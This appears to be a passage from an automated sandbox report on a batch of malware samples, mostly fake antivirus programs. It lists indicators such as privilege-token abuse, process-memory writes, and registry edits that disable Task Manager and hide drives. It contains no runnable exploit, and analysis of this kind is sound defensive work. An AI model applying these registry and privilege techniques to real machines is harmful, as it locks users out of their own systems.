a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a walliant.exe Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA 6AdwCleaner.exe -
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 490 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 422 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 488 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 489 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 6032 msedge.exe 6032 msedge.exe 1832 msedge.exe 1832 msedge.exe 5180 msedge.exe 5180 msedge.exe 548 ska2pwej.aeh.tmp 548 ska2pwej.aeh.tmp 4012 x2s443bc.cs1.tmp 4012 x2s443bc.cs1.tmp 4860 MassiveInstaller.tmp 4860 MassiveInstaller.tmp 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 5312 Massive.exe 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 1156 downloadly_installer.tmp 3008 usеrinit.exe 3008 usеrinit.exe 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2676 NavaShield.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4728 walliant.exe Token: SeDebugPrivilege 5128 taskkill.exe Token: SeDebugPrivilege 1368 taskkill.exe Token: SeDebugPrivilege 4812 taskkill.exe Token: SeDebugPrivilege 4992 taskkill.exe Token: SeRestorePrivilege 1188 7zG.exe Token: 35 1188 7zG.exe Token: SeSecurityPrivilege 1188 7zG.exe Token: SeSecurityPrivilege 1188 7zG.exe Token: SeDebugPrivilege 4700 [email protected] Token: SeSecurityPrivilege 4700 [email protected] Token: SeDebugPrivilege 3008 usеrinit.exe Token: SeSecurityPrivilege 5220 mofcomp.exe Token: SeAssignPrimaryTokenPrivilege 5272 svchost.exe Token: SeIncreaseQuotaPrivilege 5272 svchost.exe Token: SeSecurityPrivilege 5272 svchost.exe Token: SeTakeOwnershipPrivilege 5272 svchost.exe Token: SeLoadDriverPrivilege 5272 svchost.exe Token: SeSystemtimePrivilege 5272 svchost.exe Token: SeBackupPrivilege 5272 svchost.exe Token: SeRestorePrivilege 5272 svchost.exe Token: SeShutdownPrivilege 5272 svchost.exe Token: SeSystemEnvironmentPrivilege 5272 svchost.exe Token: SeUndockPrivilege 5272 svchost.exe Token: SeManageVolumePrivilege 5272 svchost.exe Token: SeAssignPrimaryTokenPrivilege 5272 svchost.exe Token: SeIncreaseQuotaPrivilege 5272 svchost.exe Token: SeSecurityPrivilege 5272 svchost.exe Token: SeTakeOwnershipPrivilege 5272 svchost.exe Token: SeLoadDriverPrivilege 5272 svchost.exe Token: SeSystemtimePrivilege 5272 svchost.exe Token: SeBackupPrivilege 5272 svchost.exe Token: SeRestorePrivilege 5272 svchost.exe Token: SeShutdownPrivilege 5272 svchost.exe Token: SeSystemEnvironmentPrivilege 5272 svchost.exe Token: SeUndockPrivilege 5272 svchost.exe Token: SeManageVolumePrivilege 5272 svchost.exe Token: SeAssignPrimaryTokenPrivilege 5272 svchost.exe Token: SeIncreaseQuotaPrivilege 5272 svchost.exe Token: SeSecurityPrivilege 5272 svchost.exe Token: SeTakeOwnershipPrivilege 5272 svchost.exe Token: SeLoadDriverPrivilege 5272 svchost.exe Token: SeSystemtimePrivilege 5272 svchost.exe Token: SeBackupPrivilege 5272 svchost.exe Token: SeRestorePrivilege 5272 svchost.exe Token: SeShutdownPrivilege 5272 svchost.exe Token: SeSystemEnvironmentPrivilege 5272 svchost.exe Token: SeUndockPrivilege 5272 svchost.exe Token: SeManageVolumePrivilege 5272 svchost.exe Token: SeAssignPrimaryTokenPrivilege 5272 svchost.exe Token: SeIncreaseQuotaPrivilege 5272 svchost.exe Token: SeSecurityPrivilege 5272 svchost.exe Token: SeTakeOwnershipPrivilege 5272 svchost.exe Token: SeLoadDriverPrivilege 5272 svchost.exe Token: SeSystemtimePrivilege 5272 svchost.exe Token: SeBackupPrivilege 5272 svchost.exe Token: SeRestorePrivilege 5272 svchost.exe Token: SeShutdownPrivilege 5272 svchost.exe Token: SeSystemEnvironmentPrivilege 5272 svchost.exe Token: SeUndockPrivilege 5272 svchost.exe Token: SeManageVolumePrivilege 5272 svchost.exe Token: SeAssignPrimaryTokenPrivilege 5272 svchost.exe Token: SeIncreaseQuotaPrivilege 5272 svchost.exe Token: SeSecurityPrivilege 5272 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe -
Suspicious use of SendNotifyMessage 61 IoCs
pid Process 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 2860 msedge.exe 4728 walliant.exe 4716 Downloadly.exe 2780 [email protected] 2780 [email protected] 2780 [email protected] 4796 [email protected] 4796 [email protected] 4796 [email protected] 4104 avpc2009.exe 4796 [email protected] 4796 [email protected] 4796 [email protected] 4012 [email protected] 4012 [email protected] 4796 [email protected] 2676 NavaShield.exe 2676 NavaShield.exe 2676 NavaShield.exe 4796 [email protected] 1948 vav.exe 4796 [email protected] 4796 [email protected] 4796 [email protected] 4796 [email protected] 4796 [email protected] 1720 Free YouTube Downloader.exe 4796 [email protected] 4796 [email protected] 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 1832 msedge.exe 4796 [email protected] -
Suspicious use of SetWindowsHookEx 47 IoCs
pid Process 560 OpenWith.exe 2780 AcroRd32.exe 2780 AcroRd32.exe 2780 AcroRd32.exe 2780 AcroRd32.exe 4728 walliant.exe 4728 walliant.exe 4716 Downloadly.exe 4716 Downloadly.exe 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 2780 [email protected] 3100 antivirus-platinum.exe 4796 [email protected] 4796 [email protected] 2780 [email protected] 2780 [email protected] 4104 avpc2009.exe 4104 avpc2009.exe 3676 [email protected] 3676 [email protected] 1464 6AdwCleaner.exe 1464 6AdwCleaner.exe 2880 6AdwCleaner.exe 2880 6AdwCleaner.exe 4888 OpenWith.exe 5852 [email protected] 6040 [email protected] 2676 NavaShield.exe 1012 NavaBridge.exe 4592 NavaDebugger.exe 5676 vbvxcn.exe 5676 vbvxcn.exe 1948 vav.exe 1948 vav.exe 1948 vav.exe 1948 vav.exe 1948 vav.exe 1948 vav.exe 392 [email protected] 2780 [email protected] 1948 vav.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2860 wrote to memory of 1316 2860 msedge.exe 80 PID 2860 wrote to memory of 1316 2860 msedge.exe 80 PID 2860 wrote to memory of 5312 2860 msedge.exe 81 PID 2860 wrote to memory of 5312 2860 msedge.exe 81 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 3144 2860 msedge.exe 82 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 PID 2860 wrote to memory of 5532 2860 msedge.exe 83 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" antivirus-platinum.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" antivirus-platinum.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1296 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbTNTS1V0bDdKNTZVbmljSExkcUVpQjBtOVpNUXxBQ3Jtc0tuWVVjcGZVTzBqMHo3cE41bUFlckdSRUVHRU93WjdwbUo1dUFrUUNxR1htUzlCdktsT3VodURGdmFMYWJKbXN6dFd3cFR3elJkcXRHX0lOUFFCY3FYRzBBMDBiREpfdTR2SzBBc3Z4S3J4MV9Xd295WQ&q=https%3A%2F%2Fenderman.ch%2F&v=xwJJkvIsEJQ1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x318,0x7ffbe916f208,0x7ffbe916f214,0x7ffbe916f2202⤵PID:1316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=es --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1904,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:32⤵PID:5312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2060,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:22⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=es --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2576,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:82⤵PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3384,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:12⤵PID:5976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3392,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=3472 /prefetch:12⤵PID:2284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=es --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4116,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=4996 /prefetch:82⤵PID:5016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=es --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4940,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5016 /prefetch:82⤵PID:4964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=es --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5528,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:82⤵PID:2364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=es --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5700,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5724 /prefetch:82⤵PID:4300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=es --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5700,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5724 /prefetch:82⤵PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5984,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=6032 /prefetch:12⤵PID:3608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=es --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6224,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=136 /prefetch:82⤵PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=es --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6504,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5652 /prefetch:82⤵PID:1496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=es --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6508,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5576 /prefetch:82⤵PID:1112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6496,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:12⤵PID:6044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=5052,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5252 /prefetch:12⤵PID:1504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=3704,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5248 /prefetch:12⤵PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=es --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=4828 /prefetch:82⤵PID:3864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=es --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6756,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5000 /prefetch:82⤵PID:2056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6816,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=6812 /prefetch:82⤵PID:4384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=es --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=6260 /prefetch:82⤵PID:2132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=6584,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:12⤵PID:4808
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6260,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=6600 /prefetch:82⤵PID:3428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6608,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:6032
-
-
